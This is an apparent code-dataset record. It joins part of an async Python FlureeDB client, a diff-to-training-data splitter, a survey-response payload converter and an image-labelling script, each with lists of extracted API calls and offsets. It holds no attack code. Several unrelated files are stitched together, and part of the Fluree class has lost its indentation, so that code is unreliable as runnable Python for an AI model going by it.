            Current wall-clock time or block time in epoch millis.
        block : int
            Block number to query against when firing instant callbacks.
        fromblock : bool
            True when `instant` comes from an actual block, False for periodic polls.
        """
        minute = 60000
        timeout = 1*minute
        # Note the operator precedence: fires when `fromblock` is set, OR when a
        # previous instant is known and more than `timeout` millis have passed.
        if (fromblock or
                self.monitor["lastblock_instant"] and
                self.monitor["lastblock_instant"] + timeout < instant):
            # Only fire callbacks when we have a previous instant to window from.
            if self.monitor["lastblock_instant"]:
                await self._do_instant_monitor(self.monitor["lastblock_instant"], instant, block)
            self.monitor["lastblock_instant"] = instant
    async def _get_and_preprocess_block(self, blockno):
        """Fetch a block by block number and preprocess it
        Parameters
        ----------
        blockno : int
            Number of the block that needs to be fetched
        Returns
        -------
        list
            A grouped and predicate patched version of the fetched block.
        dict
            Object id to operation dict
        int
            Block instant (see NOTE below), or None
        dict
            _block metadata (predicate suffix -> value)
        """
        # Fetch the new block
        block_data = await self.block.query(block=blockno)
        # Group by object; on an unknown predicate id, rebuild the predicate map
        # for this block and retry once.
        try:
            grouped = await self._group_block_flakes(block_data, blockno)
        except FlureeUnexpectedPredicateNumber:
            await self._build_predicates_map(blockno)
            grouped = await self._group_block_flakes(block_data, blockno)
        # Distill new ones using _tx/tempids
        obj_tx = {}
        block_meta = {}
        for obj in grouped:
            transactions = None
            tempids = None
            instant = None
            collection = self._get_flakeset_collection(grouped[obj])
            if collection == "_tx":
                transactions, tempids = self._get_transactions_and_temp_ids(grouped[obj])
            if collection == "_block":
                instant = self._get_block_instant(grouped[obj])
                for flake in grouped[obj]:
                    # Collect "_block/<suffix>" values as block metadata.
                    if len(flake[1].split("/")) > 1:
                        block_meta[flake[1].split("/")[1]] = flake[2]
            if transactions:
                obj_tx = self._get_object_id_to_operation_map(tempids, transactions)
            if instant:
                await self._process_instant(instant, blockno, True)
        # NOTE(review): `instant` is reset on every loop iteration, so the returned
        # value is only non-None when the _block group is iterated last — presumably
        # guaranteed by flake ordering; verify against FlureeDB block layout.
        return grouped, obj_tx, instant, block_meta
    async def _process_flakeset(self, collection, obj, obj_tx, blockno, block_meta):
        """Classify one object's flakeset as insert/update/delete and fire listeners.
        Parameters
        ----------
        collection : str
            name of the collection the object for this flakeset refers to
        obj : list
            The flakelist
        obj_tx : dict
            Dictionary mapping from object id to operation object.
        blockno : int
            Block number of the block currently being processed.
        block_meta : dict
            _block metadata passed through to the listener callbacks.
        """
        # pylint: disable=too-many-branches,too-many-statements
        operation = None
        action = None
        previous = None
        latest = None
        # Find the transaction operation responsible for this object, falling back
        # to the single-operation ("") entry when present.
        if obj[0][0] in obj_tx:
            operation = obj_tx[obj[0][0]]
        elif "" in obj_tx:
            operation = obj_tx[""]
        # Scan the flakes: assertions (True) vs retractions (False), and whether
        # any predicate involved is a "multi" predicate.
        has_true = False
        has_false = False
        has_multi = False
        for flake in obj:
            if flake[4]:
                has_true = True
            else:
                has_false = True
            if flake[1] in self.monitor["predicate_map_multi"]:
                if self.monitor["predicate_map_multi"][flake[1]]:
                    has_multi = True
        # Expensive but unambiguous path: query the object before and after the block.
        if self.monitor["always_query_object"]:
            previous = await self.flureeql.query(select=["*"], ffrom=obj[0][0], block=blockno-1)
            if previous:
                previous = previous[0]
                action = "update"
            else:
                previous = None
            latest = await self.flureeql.query(select=["*"], ffrom=obj[0][0], block=blockno)
            if latest:
                latest = latest[0]
            else:
                latest = None
            if previous is None:
                action = "insert"
            elif latest is None:
                action = "delete"
            else:
                action = "update"
        # Heuristic classification from the transaction operation and flake pattern;
        # ordering of these checks matters.
        if operation and "_action" in operation and operation["_action"] != "upsert" and not has_multi:
            action = operation["_action"]
        if action is None and has_true and has_false:
            action = "update"
        if action is None and operation and "_id" in operation and isinstance(operation["_id"], str):
            action = "insert"
        if action is None and operation and has_false and not has_true:
            # A single retraction on a multi predicate removes one value: an update.
            if len(obj) == 1 and has_multi:
                action = "update"
            else:
                action = "delete"
        if action is None and has_true and not has_false:
            if blockno > 1:
                # Assertions only: distinguish insert from update by looking at the
                # object's state in the previous block.
                previous = await self.flureeql.query(select=["*"], ffrom=obj[0][0], block=blockno-1)
                if previous:
                    previous = previous[0]
                    action = "update"
                else:
                    previous = None
                    action = "insert"
            else:
                previous = None
                action = "insert"
        if action is None:
            # Last resort: check whether the object still exists after this block.
            latest = await self.flureeql.query(select=["*"], ffrom=obj[0][0], block=blockno)
            if latest:
                latest = latest[0]
                action = "update"
            else:
                latest = None
                action = "delete"
        # Dispatch to the registered listeners for this collection/event type.
        if action == "insert" and "C" in self.monitor["listeners"][collection]:
            for callback in self.monitor["listeners"][collection]["C"]:
                await callback(obj_id=obj[0][0], flakes=obj, new_obj=latest, operation=operation, block_meta=block_meta)
        elif action == "update" and "U" in self.monitor["listeners"][collection]:
            for callback in self.monitor["listeners"][collection]["U"]:
                await callback(obj_id=obj[0][0],
                               flakes=obj,
                               old_obj=previous,
                               new_obj=latest,
                               operation=operation,
                               block_meta=block_meta)
        elif action == "delete" and "D" in self.monitor["listeners"][collection]:
            for callback in self.monitor["listeners"][collection]["D"]:
                await callback(obj_id=obj[0][0], flakes=obj, old_obj=previous, operation=operation, block_meta=block_meta)
async def monitor_untill_stopped(self):
"""Run the block event monitor untill stopped
Raises
------
NotImplementedError
Currently raised when rewing is specified.
RuntimeError
Raised either when there are no listeners set, or if there are too many errors.
"""
# pylint: disable=too-many-nested-blocks, too-many-branches, too-many-return-statements
if (not bool(self.monitor["listeners"])) and (not bool(self.monitor["instant_monitors"])):
raise RuntimeError("Can't start monitor with zero registered listeners")
# Set running to true. We shall abort when it is set to false.
self.monitor["running"] = True
await self._figure_out_next_block()
if not self.monitor["running"]:
return
startblock = await self._find_start_block() + 1
if not self.monitor["running"]:
return
# First make a dict from the _predicate collection.
if startblock > 1:
await self._build_predicates_map(startblock - 1)
if not self.monitor["running"]:
return
noblocks = True
if startblock > 1 and self.monitor["instant_monitors"] and self.monitor["lastblock_instant"] is None:
self.monitor["lastblock_instant"] = await self._get_block_instant_by_blockno(startblock-1)
if not self.monitor["running"]:
return
stats_error_count = 0
last_instant = 0
while self.monitor["running"]:
# If we had zero blocks to process the last time around, wait a full second before
# polling again if there are new blocks.
if noblocks:
await asyncio.sleep(1)
if not self.monitor["running"]:
return
await self._process_instant(int(time.time()*1000), startblock - 1, False)
now = int(time.time()*1000)
if now - last_instant >= 59500: # Roughly one minute
last_instant = now
await self.monitor["on_block_processed"](startblock - 1, now)
if not self.monitor["running"]:
return
noblocks = True
endblock, stats_error_count = await self._get_endblock()
if not self.monitor["running"]:
return
if endblock:
if endblock >= startblock:
noblocks = False
for block in range(startblock, endblock + 1):
grouped, obj_tx, instant, block_meta = await self._get_and_preprocess_block(block)
# Process per object.
for obj in grouped:
if obj > 0:
collection = self._get_flakeset_collection(grouped[obj])
if collection in self.monitor["listeners"]:
await self._process_flakeset(collection, grouped[obj], obj_tx, block, block_meta)
if not self.monitor["running"]:
return
# Call the persistence layer.
await self.monitor["on_block_processed"](block, instant)
last_instant = instant
# Set the new start block.
startblock = endblock + 1
else:
stats_error_count += 1
if stats_error_count > 100:
raise RuntimeError("Too many errors from ledger_stats call")
async def ready(self):
"""Awaitable that polls the database untill the schema contains collections"""
while True:
try:
await self.flureeql.query(
select=["_collection/name"],
ffrom="_collection"
)
return
except FlureeHttpError:
await asyncio.sleep(0.1)
    async def __aexit__(self, exc_type, exc, traceback):
        """Async context-manager exit: close the HTTP(S) session.

        Parameters
        ----------
        exc_type : type
            Exception type raised in the 'async with' body, or None
        exc : Exception
            Exception instance, or None
        traceback : traceback
            Traceback object, or None
        """
        await self.close_session()
    async def __aenter__(self):
        """Method for allowing 'async with' constructs

        Returns
        -------
        _FlureeDbClient
            this fluree DB client
        """
        return self
async def close_session(self):
"""Close HTTP(S) session to FlureeDB"""
if self.session:
await self.session.close()
return
def __dir__(self):
"""Dir function for class
Returns
-------
list
List of defined (pseudo) attributes
"""
return list(self.known_endpoints) + ["close_session",
"__init__",
"__dir__",
"__getattr__",
" __aenter__",
" __aexit__"]
    def __getattr__(self, api_endpoint):
        # pylint: disable=too-many-statements
        """Select API endpoint
        Parameters
        ----------
        api_endpoint : string
            Name of the API endpoint.
        Returns
        -------
        object
            Endpoint object suitable for API endpoint.
        Raises
        ------
        NotImplementedError
            Defined endpoint without library implementation (for now)
        AttributeError
            Undefined API endpoint invoked
        FlureeKeyRequired
            When 'command' endpoint is invoked in open-API mode.
        """
        # The helper classes below are (re)defined on every attribute lookup;
        # they receive the client explicitly via constructor arguments.
        class _StringEndpoint:
            def __init__(self, api_endpoint, client, ssl_verify_disabled=False):
                """Constructor
                Parameters
                ----------
                api_endpoint : string
                    Name of the API endpoint
                client: object
                    The wrapping _FlureeDbClient
                ssl_verify_disabled: bool
                    If https, don't validate ssl certs.
                """
                self.api_endpoint = api_endpoint
                secure = ""
                if client.https:
                    secure = "s"
                # Endpoint URL: http(s)://<host>:<port>/fdb/<database>/<endpoint>,
                # with underscores in the endpoint name mapped to dashes.
                self.url = "http" + \
                    secure + \
                    "://" + \
                    client.host + \
                    ":" + \
                    str(client.port) + \
                    "/fdb/" + \
                    client.database + \
                    "/" + \
                    "-".join(api_endpoint.split("_"))
                self.signer = client.signer
                self.session = client.session
                self.ssl_verify_disabled = ssl_verify_disabled
            async def _post_body_with_headers(self, body, headers):
                """Internal, post body with HTTP headers
                Parameters
                ----------
                body : string
                    HTTP Body string
                headers : dict
                    Key value pairs to use in HTTP POST request
                Returns
                -------
                string
                    Content as returned by HTTP server
                Raises
                ------
                FlureeHttpError
                    When HTTP status from fluree server is anything other than 200
                """
                if self.ssl_verify_disabled:
                    # ssl=False disables certificate validation for this request.
                    async with self.session.post(self.url, data=body, headers=headers, ssl=False) as resp:
                        if resp.status != 200:
                            raise FlureeHttpError(await resp.text(), resp.status)
                        return await resp.text()
                else:
                    async with self.session.post(self.url, data=body, headers=headers) as resp:
                        if resp.status != 200:
                            raise FlureeHttpError(await resp.text(), resp.status)
                        return await resp.text()
            async def header_signed(self, query_body):
                """Do a HTTP query using headers for signing
                Parameters
                ----------
                query_body : any
                    query body to sign using headers.
                Returns
                -------
                string
                    Return body from server
                """
                if self.signer:
                    body, headers, _ = self.signer.sign_query(query_body, querytype=self.api_endpoint)
                else:
                    # Open-API mode: no signer, send the query unsigned.
                    body = json.dumps(query_body, indent=4, sort_keys=True)
                    headers = {"Content-Type": "application/json"}
                return await self._post_body_with_headers(body, headers)
            async def body_signed(self, transact_obj, deps=None):
                """Do a HTTP query using body envelope for signing
                Parameters
                ----------
                transact_obj : list
                    transaction to sign using body envelope.
                deps: dict
                    FlureeDB deps
                Returns
                -------
                string
                    Return body from server
                """
                command = self.signer.sign_transaction(transact_obj, deps)
                body = json.dumps(command, indent=4, sort_keys=True)
                headers = {"content-type": "application/json"}
                return await self._post_body_with_headers(body, headers)
            async def empty_post_unsigned(self):
                """Do an HTTP POST without body and without signing
                Returns
                -------
                string
                    Return body from server
                """
                return await self._post_body_with_headers(None, None)
        class FlureeQlEndpointMulti:
            """Endpoint for JSON based (FlureeQl) multi-queries"""
            def __init__(self, client, ssl_verify_disabled, raw=None):
                """Constructor
                Parameters
                ----------
                client: object
                    The wrapping _FlureeDbClient
                ssl_verify_disabled: bool
                    When using https, don't validate ssl certs.
                raw: dict
                    The whole raw multiquery
                """
                self.stringendpoint = _StringEndpoint("multi_query", client, ssl_verify_disabled)
                if raw:
                    self.multi_query = raw
                else:
                    self.multi_query = {}
            def __call__(self, raw=None):
                """Invoke as function object.
                Parameters
                ----------
                raw: dict
                    The whole raw multiquery
                Returns
                -------
                FlureeQlEndpointMulti
                    Pointer to self
                """
                if raw is not None:
                    self.multi_query = raw
                return self
            def __dir__(self):
                """Dir function for class
                Returns
                -------
                list
                    List of defined (pseudo) attributes
                """
                return ["__call__", "__dir__", "__init__"]
            def __getattr__(self, method):
                """query
                Parameters
                ----------
                method : string
                    subquery name
                Returns
                -------
                _FlureeQlSubQuery
                    Helper class for creating FlureeQl multi-queries.
                """
                return _FlureeQlSubQuery(self, method)
            async def query(self):
                """Do the actual multi-query
                Returns
                -------
                dict
                    The result from the multi-query
                """
                return_body = await self.stringendpoint.header_signed(self.multi_query)
                return json.loads(return_body)
        class FlureeQlEndpoint:
            """Endpoint for JSON based (FlureeQl) queries"""
            def __init__(self, api_endpoint, client, ssl_verify_disabled):
                """Constructor
                Parameters
                ----------
                api_endpoint : string
                    Name of the API endpoint
                client: object
                    The wrapping _FlureeDbClient
                ssl_verify_disabled: bool
                    When using https, don't validate ssl certs.
                """
                # The 'flureeql' alias maps onto the server's 'query' endpoint.
                if api_endpoint == "flureeql":
                    api_endpoint = "query"
                self.api_endpoint = api_endpoint
                self.stringendpoint = _StringEndpoint(api_endpoint, client, ssl_verify_disabled)
            def __dir__(self):
                """Dir function for class
                Returns
                -------
                list
                    List of defined (pseudo) attributes
                """
                return ["query", "actual_query", "__dir__", "__init__"]
            def __getattr__(self, method):
                """query
                Parameters
                ----------
                method : string
                    should be 'query'
                Returns
                -------
                _FlureeQlQuery
                    Helper class for creating FlureeQl queries.
                Raises
                ------
                AttributeError
                    When anything other than 'query' is provided as method.
                """
                if method != 'query':
                    raise AttributeError("FlureeQlEndpoint has no attribute named " + method)
                return _FlureeQlQuery(self)
            async def actual_query(self, query_object):
                """Execute a query with a python dict that should get JSON serialized and convert JSON
                response back into a python object
                Parameters
                ----------
                query_object : dict
                    JSON serializable query
                Returns
                -------
                dict
                    JSON decoded query response
                """
                return_body = await self.stringendpoint.header_signed(query_object)
                return json.loads(return_body)
        class CommandEndpoint:
            """Endpoint for FlureeQL command"""
            def __init__(self, api_endpoint, client, ssl_verify_disabled=False):
                """Constructor
                Parameters
                ----------
                api_endpoint : string
                    Name of the API endpoint
                client: object
                    The wrapping _FlureeDbClient
                ssl_verify_disabled: bool
                    When using https, don't validate ssl certs.
                """
                self.client = client
                self.stringendpoint = _StringEndpoint(api_endpoint, client, ssl_verify_disabled)
            async def transaction(self, transaction_obj, deps=None, do_await=True):
                """Transact with list of python dicts that should get serialized to JSON,
                returns a transaction handle for polling FlureeDB if needed.
                Parameters
                ----------
                transaction_obj : list
                    Transaction list
                deps: dict
                    FlureeDB deps
                do_await: bool
                    Do we wait for the transaction to complete, or do we fire and forget?
                Returns
                -------
                string
                    transaction ID of pending transaction
                Raises
                ------
                FlureeTransactionFailure
                    When transaction fails
                """
                tid = await self.stringendpoint.body_signed(transaction_obj, deps)
                # The response body is a JSON string; strip the surrounding quotes.
                tid = tid[1:-1]
                if not do_await:
                    return tid
                # Poll the _tx collection until the transaction shows up.
                while True:
                    status = await self.client.query.query(select=["*"], ffrom=["_tx/id", tid])
                    if status:
                        if "error" in status[0]:
                            raise FlureeTransactionFailure("Transaction failed:" + status[0]["error"])
                        if "_tx/error" in status[0]:
                            raise FlureeTransactionFailure("Transaction failed:" + status[0]["_tx/error"])
                        return status[0]
                    await asyncio.sleep(0.1)
        class LedgerStatsEndpoint:
            """Endpoint for ledger_stats"""
            def __init__(self, client, ssl_verify_disabled=False):
                """Constructor
                Parameters
                ----------
                client: object
                    The wrapping _FlureeDbClient
                ssl_verify_disabled: bool
                    When using https, don't validate ssl certs.
                """
                self.stringendpoint = _StringEndpoint('ledger_stats', client, ssl_verify_disabled)
            async def __call__(self):
                """Send request to ledger-stats endpoint and retrieve result
                Returns
                -------
                dict
                    json decode result from the server.
                """
                return_body = await self.stringendpoint.empty_post_unsigned()
                return json.loads(return_body)
        # Dispatch: validate the endpoint name, then hand back a suitable helper.
        if api_endpoint not in self.known_endpoints:
            raise AttributeError("FlureeDB has no endpoint named " + api_endpoint)
        if api_endpoint not in self.implemented:
            raise NotImplementedError("No implementation yet for " + api_endpoint)
        if api_endpoint in ["command"]:
            # Commands must be signed; open-API mode has no signing key.
            if self.signer is None:
                raise FlureeKeyRequired("Command endpoint not supported in open-API mode. privkey required!")
            return CommandEndpoint(api_endpoint, self, self.ssl_verify_disabled)
        if api_endpoint in ["multi_query"]:
            return FlureeQlEndpointMulti(self, self.ssl_verify_disabled)
        if api_endpoint == 'ledger_stats':
            return LedgerStatsEndpoint(self, self.ssl_verify_disabled)
        return FlureeQlEndpoint(api_endpoint, self, self.ssl_verify_disabled)
|
[
"json.loads",
"asyncio.sleep",
"json.dumps",
"time.time",
"aiohttp.ClientSession",
"aioflureedb.signing.DbSigner"
] |
[((12320, 12364), 'json.dumps', 'json.dumps', (['kwdict'], {'indent': '(4)', 'sort_keys': '(True)'}), '(kwdict, indent=4, sort_keys=True)\n', (12330, 12364), False, 'import json\n'), ((18508, 18531), 'aiohttp.ClientSession', 'aiohttp.ClientSession', ([], {}), '()\n', (18529, 18531), False, 'import aiohttp\n'), ((26528, 26551), 'aiohttp.ClientSession', 'aiohttp.ClientSession', ([], {}), '()\n', (26549, 26551), False, 'import aiohttp\n'), ((18202, 18265), 'aioflureedb.signing.DbSigner', 'DbSigner', (['masterkey', 'auth_address', 'None', 'sig_validity', 'sig_fuel'], {}), '(masterkey, auth_address, None, sig_validity, sig_fuel)\n', (18210, 18265), False, 'from aioflureedb.signing import DbSigner\n'), ((26411, 26476), 'aioflureedb.signing.DbSigner', 'DbSigner', (['privkey', 'auth_address', 'database', 'sig_validity', 'sig_fuel'], {}), '(privkey, auth_address, database, sig_validity, sig_fuel)\n', (26419, 26476), False, 'from aioflureedb.signing import DbSigner\n'), ((7786, 7806), 'json.loads', 'json.loads', (['response'], {}), '(response)\n', (7796, 7806), False, 'import json\n'), ((8061, 8081), 'json.loads', 'json.loads', (['response'], {}), '(response)\n', (8071, 8081), False, 'import json\n'), ((8599, 8617), 'asyncio.sleep', 'asyncio.sleep', (['(0.5)'], {}), '(0.5)\n', (8612, 8617), False, 'import asyncio\n'), ((59287, 59332), 'json.dumps', 'json.dumps', (['command'], {'indent': '(4)', 'sort_keys': '(True)'}), '(command, indent=4, sort_keys=True)\n', (59297, 59332), False, 'import json\n'), ((62068, 62091), 'json.loads', 'json.loads', (['return_body'], {}), '(return_body)\n', (62078, 62091), False, 'import json\n'), ((64478, 64501), 'json.loads', 'json.loads', (['return_body'], {}), '(return_body)\n', (64488, 64501), False, 'import json\n'), ((67689, 67712), 'json.loads', 'json.loads', (['return_body'], {}), '(return_body)\n', (67699, 67712), False, 'import json\n'), ((10744, 10760), 'json.loads', 'json.loads', (['data'], {}), '(data)\n', (10754, 10760), False, 
'import json\n'), ((11150, 11166), 'json.loads', 'json.loads', (['data'], {}), '(data)\n', (11160, 11166), False, 'import json\n'), ((13081, 13099), 'asyncio.sleep', 'asyncio.sleep', (['(0.1)'], {}), '(0.1)\n', (13094, 13099), False, 'import asyncio\n'), ((38608, 38628), 'json.loads', 'json.loads', (['flake[2]'], {}), '(flake[2])\n', (38618, 38628), False, 'import json\n'), ((51497, 51513), 'asyncio.sleep', 'asyncio.sleep', (['(1)'], {}), '(1)\n', (51510, 51513), False, 'import asyncio\n'), ((58514, 58562), 'json.dumps', 'json.dumps', (['query_body'], {'indent': '(4)', 'sort_keys': '(True)'}), '(query_body, indent=4, sort_keys=True)\n', (58524, 58562), False, 'import json\n'), ((38888, 38908), 'json.loads', 'json.loads', (['flake[2]'], {}), '(flake[2])\n', (38898, 38908), False, 'import json\n'), ((51705, 51716), 'time.time', 'time.time', ([], {}), '()\n', (51714, 51716), False, 'import time\n'), ((53801, 53819), 'asyncio.sleep', 'asyncio.sleep', (['(0.1)'], {}), '(0.1)\n', (53814, 53819), False, 'import asyncio\n'), ((66761, 66779), 'asyncio.sleep', 'asyncio.sleep', (['(0.1)'], {}), '(0.1)\n', (66774, 66779), False, 'import asyncio\n'), ((51637, 51648), 'time.time', 'time.time', ([], {}), '()\n', (51646, 51648), False, 'import time\n')]
|
import json
import os
import sys
from collections import Counter
from pathlib import Path
TRAIN_DIR = Path('data/train')
def count_popular_languages():
    """Read JSON-lines records from stdin and print file-extension frequencies."""
    extension_counts = Counter(
        path_after.rsplit('.', 1)[-1]
        for line in sys.stdin
        for _, path_after in json.loads(line)['paths']
    )
    for extension, frequency in extension_counts.most_common():
        print(extension, frequency)
def main():
    """Split JSON-lines diff records from stdin into per-language training files.

    Each input line is a JSON object with parallel ``diffs`` and ``paths``
    entries; the post-change diff text is appended to
    ``data/train/p-<lang_id>/github.txt`` chosen by the file extension.
    """
    extension_mapping = {
        'c': 'c',
        'h': 'c',
        'cc': 'cpp',
        'cpp': 'cpp',
        'cs': 'cs',
        'css': 'css',
        'go': 'go',
        'hs': 'hs',
        'html': 'html',
        'java': 'java',
        'js': 'js',
        'm': 'm',
        'php': 'php',
        'py': 'py',
        'rb': 'rb',
        'rs': 'rs',
        'scala': 'scala',
        'sh': 'sh',
        'swift': 'swift',
        'ts': 'ts',
        'xml': 'xml',
    }
    lang_id_to_file = {}
    try:
        for line in sys.stdin:
            data = json.loads(line)
            for (_, diff_after), (_, path_after) in zip(data['diffs'], data['paths']):
                # Skip trivial (<5 non-space chars) or oversized (>256 chars) diffs.
                if len(diff_after.strip()) < 5 or len(diff_after) > 256:
                    continue
                extension = path_after.rsplit('.', 1)[-1]
                lang_id = extension_mapping.get(extension)
                if lang_id is None:
                    continue
                f = lang_id_to_file.get(lang_id)
                if f is None:
                    # exist_ok=True avoids the racy exists()/makedirs() pair.
                    os.makedirs(TRAIN_DIR / f'p-{lang_id}', exist_ok=True)
                    f = open(TRAIN_DIR / f'p-{lang_id}' / 'github.txt', mode='w',
                             encoding='utf-8')
                    lang_id_to_file[lang_id] = f
                f.write(diff_after)
                f.write('\n')
    finally:
        # Flush/close every opened handle even if parsing fails mid-stream.
        for f in lang_id_to_file.values():
            f.close()
# Script entry point: stream JSON-lines from stdin into per-language files.
if __name__ == '__main__':
    main()
|
[
"os.makedirs",
"json.loads",
"os.path.exists",
"pathlib.Path",
"collections.Counter"
] |
[((103, 121), 'pathlib.Path', 'Path', (['"""data/train"""'], {}), "('data/train')\n", (107, 121), False, 'from pathlib import Path\n'), ((177, 186), 'collections.Counter', 'Counter', ([], {}), '()\n', (184, 186), False, 'from collections import Counter\n'), ((230, 246), 'json.loads', 'json.loads', (['line'], {}), '(line)\n', (240, 246), False, 'import json\n'), ((1039, 1055), 'json.loads', 'json.loads', (['line'], {}), '(line)\n', (1049, 1055), False, 'import json\n'), ((1490, 1532), 'os.path.exists', 'os.path.exists', (["(TRAIN_DIR / f'p-{lang_id}')"], {}), "(TRAIN_DIR / f'p-{lang_id}')\n", (1504, 1532), False, 'import os\n'), ((1550, 1589), 'os.makedirs', 'os.makedirs', (["(TRAIN_DIR / f'p-{lang_id}')"], {}), "(TRAIN_DIR / f'p-{lang_id}')\n", (1561, 1589), False, 'import os\n')]
|
from typing import Mapping
from structlog import get_logger
from app.questionnaire.questionnaire_schema import DEFAULT_LANGUAGE_CODE
from app.submitter.convert_payload_0_0_1 import convert_answers_to_payload_0_0_1
from app.submitter.convert_payload_0_0_3 import convert_answers_to_payload_0_0_3
logger = get_logger()
class DataVersionError(Exception):
    """Raised when the schema declares a data version we cannot serialize."""

    def __init__(self, version):
        super().__init__()
        # Keep the offending version around for the error message below.
        self.version = version

    def __str__(self):
        return "Data version {0} not supported".format(self.version)
def convert_answers(
    schema, questionnaire_store, routing_path, submitted_at, flushed=False
):
    """
    Create the JSON answer format for down stream processing in the following format:
    ```
    {
        'tx_id': '0f534ffc-9442-414c-b39f-a756b4adc6cb',
        'type' : 'uk.gov.ons.edc.eq:surveyresponse',
        'version' : '0.0.1',
        'origin' : 'uk.gov.ons.edc.eq',
        'survey_id': '021',
        'flushed': true|false
        'collection':{
            'exercise_sid': 'hfjdskf',
            'schema_name': 'yui789',
            'period': '2016-02-01'
        },
        'started_at': '2016-03-06T15:28:05Z',
        'submitted_at': '2016-03-07T15:28:05Z',
        'launch_language_code': 'en',
        'channel': 'RH',
        'metadata': {
            'user_id': '789473423',
            'ru_ref': '432423423423'
        },
        'data': [
            ...
        ],
    }
    ```
    Args:
        schema: QuestionnaireSchema instance with populated schema json
        questionnaire_store: EncryptedQuestionnaireStorage instance for accessing current questionnaire data
        routing_path: The full routing path followed by the user when answering the questionnaire
        submitted_at: The date and time of submission
        flushed: True when system submits the users answers, False when submitted by user.
    Returns:
        Data payload
    Raises:
        DataVersionError: when the schema's data_version is neither "0.0.3" nor "0.0.1".
    """
    metadata = questionnaire_store.metadata
    response_metadata = questionnaire_store.response_metadata
    answer_store = questionnaire_store.answer_store
    list_store = questionnaire_store.list_store
    survey_id = schema.json["survey_id"]
    payload = {
        "case_id": metadata["case_id"],
        "tx_id": metadata["tx_id"],
        "type": "uk.gov.ons.edc.eq:surveyresponse",
        "version": schema.json["data_version"],
        "origin": "uk.gov.ons.edc.eq",
        "survey_id": survey_id,
        "flushed": flushed,
        "submitted_at": submitted_at.isoformat(),
        "collection": build_collection(metadata),
        "metadata": build_metadata(metadata),
        "launch_language_code": metadata.get("language_code", DEFAULT_LANGUAGE_CODE),
    }
    optional_properties = get_optional_payload_properties(metadata, response_metadata)
    if schema.json["data_version"] == "0.0.3":
        # 0.0.3 payloads nest the converted answers alongside the serialized list store.
        payload["data"] = {
            "answers": convert_answers_to_payload_0_0_3(
                answer_store, list_store, schema, routing_path
            ),
            "lists": list_store.serialize(),
        }
    elif schema.json["data_version"] == "0.0.1":
        # The 0.0.1 converter also needs the raw metadata to build its payload.
        payload["data"] = convert_answers_to_payload_0_0_1(
            metadata, answer_store, list_store, schema, routing_path
        )
    else:
        raise DataVersionError(schema.json["data_version"])
    logger.info("converted answer ready for submission")
    # Dict union (Python 3.9+): merge optional channel/context properties in.
    return payload | optional_properties
def build_collection(metadata) -> Mapping[str, str]:
    """Assemble the downstream 'collection' section from questionnaire metadata."""
    key_pairs = (
        ("exercise_sid", "collection_exercise_sid"),
        ("schema_name", "schema_name"),
        ("period", "period_id"),
    )
    return {target: metadata[source] for target, source in key_pairs}
def build_metadata(metadata) -> Mapping[str, str]:
    """Build the downstream 'metadata' section: mandatory ids plus optional fields."""
    downstream = {"user_id": metadata["user_id"], "ru_ref": metadata["ru_ref"]}
    # Optional fields are copied only when present and truthy, under new names.
    optional_pairs = (
        ("ref_p_start_date", "ref_period_start_date"),
        ("ref_p_end_date", "ref_period_end_date"),
        ("display_address", "display_address"),
    )
    for source_key, target_key in optional_pairs:
        if value := metadata.get(source_key):
            downstream[target_key] = value
    return downstream
def get_optional_payload_properties(metadata, response_metadata) -> Mapping[str, str]:
    """Collect truthy optional payload properties from metadata and response metadata."""
    optional_keys = ("channel", "case_type", "form_type", "region_code", "case_ref")
    payload = {key: value for key in optional_keys if (value := metadata.get(key))}
    if started_at := response_metadata.get("started_at"):
        payload["started_at"] = started_at
    return payload
|
[
"app.submitter.convert_payload_0_0_1.convert_answers_to_payload_0_0_1",
"app.submitter.convert_payload_0_0_3.convert_answers_to_payload_0_0_3",
"structlog.get_logger"
] |
[((307, 319), 'structlog.get_logger', 'get_logger', ([], {}), '()\n', (317, 319), False, 'from structlog import get_logger\n'), ((2881, 2966), 'app.submitter.convert_payload_0_0_3.convert_answers_to_payload_0_0_3', 'convert_answers_to_payload_0_0_3', (['answer_store', 'list_store', 'schema', 'routing_path'], {}), '(answer_store, list_store, schema, routing_path\n )\n', (2913, 2966), False, 'from app.submitter.convert_payload_0_0_3 import convert_answers_to_payload_0_0_3\n'), ((3123, 3217), 'app.submitter.convert_payload_0_0_1.convert_answers_to_payload_0_0_1', 'convert_answers_to_payload_0_0_1', (['metadata', 'answer_store', 'list_store', 'schema', 'routing_path'], {}), '(metadata, answer_store, list_store, schema,\n routing_path)\n', (3155, 3217), False, 'from app.submitter.convert_payload_0_0_1 import convert_answers_to_payload_0_0_1\n')]
|
import os
from typing import List
from trescope import Trescope
from trescope.config import ImageConfig
from trescope.controller import EnumControl
from trescope.toolbox import simpleDisplayOutputs
import pandas as pd
def clearTrescope():
    """Clear all four Trescope output panes."""
    for output_index in range(4):
        Trescope().selectOutput(output_index).clear()
def add_control():
    """Page model images through Trescope in batches of two and collect labels.

    For each image a picture pane plus an input pane (file/shape/thickness enum
    controls) is shown; labels entered at each breakpoint are accumulated and a
    cumulative pandas DataFrame is printed after every batch.
    """
    path = '../data/res/model_images'
    model_images: List[str] = os.listdir(path)
    Trescope().initialize(True, simpleDisplayOutputs(1, 4))
    # Accumulate labelled rows in a plain list: DataFrame.append was deprecated
    # in pandas 1.4 and removed in 2.0, and re-appending per row is quadratic.
    labelled_rows = []
    batch_size = 2
    for batch_index in range(len(model_images) // batch_size):
        clearTrescope()
        for sample_index in range(batch_size):
            model_image_path = model_images[batch_index * batch_size + sample_index]
            Trescope().selectOutput(sample_index * 2).plotImage(os.path.join(path, model_image_path)).withConfig(ImageConfig())
            (Trescope().selectOutput(sample_index * 2 + 1).asInput()
             .addControl(EnumControl().id('file').label('File').enumeration(model_image_path).defaultValue(model_image_path))
             .addControl(EnumControl().id('shape').label('Circle or Square').enumeration('circle', 'square').defaultValue('circle'))
             .addControl(EnumControl().id('thickness').label('Size').enumeration('xs', 's', 'm', 'l', 'xl').defaultValue('m')))
        # Block until the user labels this batch, then record the results.
        label_data = Trescope().breakPoint(f'batch_index:{batch_index}')
        for row in label_data.values():
            labelled_rows.append({'file': row['file'], 'shape': row['shape'], 'thickness': row['thickness']})
        print(pd.DataFrame(labelled_rows, columns=['file', 'shape', 'thickness']))
# Script entry point: run the interactive labelling loop.
if __name__ == '__main__':
    add_control()
|
[
"pandas.DataFrame",
"trescope.Trescope",
"trescope.config.ImageConfig",
"trescope.toolbox.simpleDisplayOutputs",
"os.path.join",
"os.listdir",
"trescope.controller.EnumControl"
] |
